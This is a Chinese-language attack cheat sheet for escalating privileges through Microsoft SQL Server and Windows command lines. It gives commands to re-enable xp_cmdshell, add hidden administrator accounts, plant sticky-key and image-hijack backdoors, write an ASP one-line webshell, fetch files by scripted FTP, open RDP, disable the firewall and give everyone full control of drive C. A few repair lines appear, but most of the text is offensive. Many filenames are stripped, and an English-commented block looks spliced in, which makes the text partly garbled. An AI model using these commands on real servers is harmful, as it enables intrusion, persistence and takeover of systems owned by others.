SQL提权语句整理

时间:2025-03-19 15:32:26
------------------------------CMD语句---------------------------------------
query user   查看会话


logoff       踢人命令


5下shift后门
系统后门:
copy c:\windows\ c:\windows\system32\
copy c:\windows\system32\ c:\windows\system32\dllcache\
attrib c:\windows\system32\ +h
attrib c:\windows\system32\dllcache\ +h


打开3389端口
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f


关闭系统防火墙
net stop sharedaccess
net stop policyagent   关闭IPSEC


SQL Server 阻止了对组件 'xp_cmdshell' 的 过程'sys.xp_cmdshell' 的访问
;EXEC sp_configure 'show advanced options', 1 --
;RECONFIGURE WITH OVERRIDE --
;EXEC sp_configure 'xp_cmdshell', 1 --
;RECONFIGURE WITH OVERRIDE -- 
;EXEC sp_configure   'show advanced options', 0 --


第一步执行:
-- Re-creates the legacy system procedure sp_addextendedproc (the original
-- Microsoft header date is kept on the create line). It registers @functname as
-- an extended stored procedure whose implementation lives in the DLL named by
-- @dllname, via dbcc addextendedproc; no validation of either argument is done here.
-- The "repair" section of these notes drops this procedure as a hardening step, so
-- a CREATE/ALTER of it, or its presence outside the stock master definition, is a
-- useful audit indicator that someone is restoring the ability to register
-- arbitrary DLLs.
create procedure sp_addextendedproc --- 1996/08/30 20:13
@functname nvarchar(517),/* (owner.)name of function to call
*/
@dllname varchar(255)/* name of DLL containing function */
as
-- Refuses to run inside an open transaction: raises error 15002 and returns 1.
-- NOTE(review): presumably because dbcc addextendedproc is not transactional -- confirm.
set implicit_transactions off
if @@trancount > 0
begin
raiserror(15002,-1,-1,'sp_addextendedproc')
return (1)
end
-- Registers the (procedure name, DLL) pair; returns 0 on success.
dbcc addextendedproc( @functname, @dllname)
return (0) -- sp_addextendedproc
GO
第二步执行
EXEC sp_addextendedproc xp_cmdshell,@dllname =''declare @o int


直接加USER:


declare @o int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'run', NULL, 'net user 123 123 /add & net localgroup administrators 123 /add'




SQL沙盒提权


EXEC .xp_regwrite 'HKEY_LOCAL_MACHINE','SoftWare\Microsoft\Jet\4.0\Engines','SandBoxMode','REG_DWORD',0


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net user admin$ 199181. /add")');


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net localgroup administrators admin$ /add")');


Select * From OpenRowSet('.4.0',';Database=c:\windows\system32\ias\','select shell("net localgroup Remote Desktop Users 123 /add")');


 
-----------------------------SQL语句--------------------------------------


修改SA密码:
Sp_password 'OldPassword','NewPassword'
sp_password Null,'199181','sa'




《防替换SHIFT》加属性
attrib c:\windows\system32\dllcache\ +h +r +s 
attrib c:\windows\system32\ +h +r +s


《防替换》去属性
attrib c:\windows\system32\ -h -r -s
attrib c:\windows\system32\dllcache\ -h -r -s


shift后门:
%SystemRoot%\


查询分离器SHIFT:
declare @o int 
exec sp_oacreate '', @o out 
exec sp_oamethod @o, 'copyfile',null,'c:\windows\' ,'c:\windows\system32\'


declare @oo int 
exec sp_oacreate '', @oo out 
exec sp_oamethod @oo, 'copyfile',null,'c:\windows\system32\' ,'c:\windows\system32\dllcache\'


WIN2000直接建立用户:
exec xp_cmdshell 'net user admin$ 199181 /add' 
exec xp_cmdshell 'net localGroup Administrators admin$ /add' 


起用用户:
net user admin$ /active:yes 


查看3389终端:
exec xp_regread 'HKEY_LOCAL_MACHINE','SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp','PortNumber'


269998505
查看配置
systeminfo
劫持地址查看
-----------------------------SQL修复-----------------------------------------------
ipconfig :查看本地ip地址
type c:\
                         解决127错误


第一步先删除:
drop procedure sp_addextendedproc 
drop procedure sp_oacreate 
exec sp_dropextendedproc 'xp_cmdshell'


第二步恢复:
dbcc addextendedproc ("sp_oacreate","") 
dbcc addextendedproc ("xp_cmdshell","")


第一
exec sp_dropextendedproc 'xp_cmdshell'


第二
dbcc addextendedproc ("xp_cmdshell","d:\Program Files\Microsoft SQL Server\MSSQL\Binn\")
;EXEC sp_configure   'show advanced options', 0 --


查看系统属性


EXEC xp_msver


declare @o int, @f int, @t int, @ret int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\', 10
exec @ret = sp_oamethod @f, 'writeline', NULL,'open xabc.'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'123'
exec @ret = sp_oamethod @f, 'writeline', NULL,'binary'
exec @ret = sp_oamethod @f, 'writeline', NULL,'get c:\'
exec @ret = sp_oamethod @f, 'writeline', NULL,'bye'
exec @ret = sp_oamethod @f, 'writeline', NULL,''
exec @ret = sp_oamethod @f, 'writeline', NULL,''
exec @ret = sp_oamethod @f, 'writeline', NULL,'exit'




普通CMD后门
xp_regwrite 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\','debugger','reg_sz','c:\windows\system32\'


SQL写一句话
exec .xp_subdirs 'd:\web\cdlxkj'; 
exec sp_makewebtask 'd:\web\cdlxkj\','select''<%execute(request("SB"))%>'' '




映象劫持
EXEC master..xp_regwrite
@rootkey='HKEY_LOCAL_MACHINE',
@key='SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\',
@value_name='Debugger',
@type='REG_SZ',
@value='C:\WINDOWS\'
   


命令查询注册表粘滞键是否被劫持
exec master..xp_regread 'HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\','Debugger'


命令劫持注册表粘滞键功能,替换成任务管理器(当然你也可以替换成你想要的其他命令)
xp_regwrite 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\', 
'Debugger','REG_SZ','C:\WINDOWS\system32\'


命令删除注册表粘滞键的劫持功能，保护你的服务器不再被他人利用
xp_regdeletekey 'HKEY_LOCAL_MACHINE', 'SOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\'
sql写文件〈写完后直接执行c:\，完成后建立user:test pass:1234〉
declare @o int, @f int, @t int, @ret int
exec sp_oacreate '', @o out
exec sp_oamethod @o, 'createtextfile', @f out, 'c:\', 1
exec @ret = sp_oamethod @f, 'writeline', NULL,'set wsnetwork=CreateObject("")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'os="WinNT://"&'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set ob=GetObject(os)'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set oe=GetObject(os&"/Administrators,group")'
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set od=("user","test")'
exec @ret = sp_oamethod @f, 'writeline', NULL,' "1234"'
exec @ret = sp_oamethod @f, 'writeline', NULL,' '
exec @ret = sp_oamethod @f, 'writeline', NULL,'Set of=GetObject(os&"/test",user) '
exec @ret = sp_oamethod @f, 'writeline', NULL,' os&"/test"'




无NET提权的脚本


struser=(0)
strpass=(1)


set lp=createObject("") 
oz="WinNT://"& 
Set ob=GetObject(oz) 
Set oe=GetObject(oz&"/Administrators,group") 
Set od=("user",struser) 
strpass 
 
Set of=GetObject(oz&"/" & struser & ",user") 
() 


For Each admin in
if struser= then
struser & " 建立成功!"

end if
Next


struser & " 用户建立失败!"
将以上保存为文件
然后执行:cscript 用户名 密码




1433无命令添加用户
用法很简单
扫到1433弱口令
net被禁止了的
把这个文件传到任何盘
然后输入命令"盘符+文件名+帐号+密码" 
如 c:\ jksing jksing"
会自动添加到administrators组


type C:\ 系统
netstat -an 是查看服务器开放的端口
Ipconfig 本机IP ipconfig/all
net user admin 1985117 /add 这个就是添加管理员的dos口令，admin$是用户名后面加个$号
net localgroup administrators admin /add这是dos下提升管理的口令
net user 要删除的用户名 /del
regedit 打开注册表
net use \\ip\ipc$ " " /user:" " 建立IPC空链接
net share abc$=c:\ 将c:盘映射为 abc$ (加了“$”之后为隐藏的共享
net use c: /del  删除映射的c盘 net use * /del /y删除全部
net start telnet                                   启动 Telnet 服务  
net start Server                                   启动 Server 服务 (IPC$ 和共享要靠这个服务)
net stop Messenger                                 停止信使服务(不会再有烦人的Win的弹出广告了)!
net stop  server                                   停止Server 服务 (关了这服务,远程的机子就不能查看你的共享和用IPC$入侵)      
net user                                           得到本地主机的用户列表




开启XP&2003终端服务
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server /v fDenyTSConnections /t REG_DWORD /d 0 /f
更改终端端口为20008(0x4E28)
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\Wds\rdpwd\Tds\tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f
REG ADD HKLM\SYSTEM\CurrentControlSet\Control\Terminal" "Server\WinStations\RDP-Tcp /v PortNumber /t REG_DWORD /d 0x4E28 /f


4.取消xp&2003系统防火墙对终端服务3389端口的限制及IP连接的限制
REG ADD HKLM\SYSTEM\CurrentControlSet\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\GloballyOpenPorts\List /v 3389:TCP /t REG_SZ /d 3389:TCP:*:Enabled:@,-22009 /f




5.开启Win2000的终端,端口为3389(需重启)
echo Windows Registry Editor Version 5.00 > 
echo. >>
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\netcache] >> 
echo "Enabled"="0" >> 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon] >> 
echo "ShutdownWithoutLogon"="0" >> 
echo [HKEY_LOCAL_MACHINE\SOFTWARE\Policies\Microsoft\Windows\Installer] >> 
echo "EnableAdminTSRemote"=dword:00000001 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server] >> 
echo "TSEnabled"=dword:00000001 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermDD] >> 
echo "Start"=dword:00000002 >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\TermService] >> 
echo "Start"=dword:00000002 >> 
echo [HKEY_USERS\.DEFAULT\Keyboard Layout\Toggle] >> 
echo "Hotkey"="1" >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\Wds\rdpwd\Tds\tcp] >> 
echo "PortNumber"=dword:00000D3D >> 
echo [HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp] >> 
echo "PortNumber"=dword:00000D3D >>


6.强行重启Win2000&Win2003系统(执行完最后一条一句后自动重启)
@ECHO OFF & cd/d %temp% & echo [version] >
(set inf=InstallHinfSection DefaultInstall)
echo signature=$chicago$ >>
echo [defaultinstall] >>
rundll32 setupapi,%inf% 1 %temp%\


7.禁用TCP/IP端口筛选 (需重启)
REG ADD HKLM\SYSTEM\ControlSet001\Services\Tcpip\parameters /v EnableSecurityFilters /t REG_DWORD /d 0 /f


8.终端超出最大连接数时可用下面的命令来连接
mstsc /v:ip:3389 /console


9.调整NTFS分区权限
cacls c: /e /t /g everyone:F     (所有人对c盘都有一切权利)
cacls %systemroot%\system32\*.exe /d everyone     (拒绝所有人访问system32中exe文件)




首先开启三个服务

Browser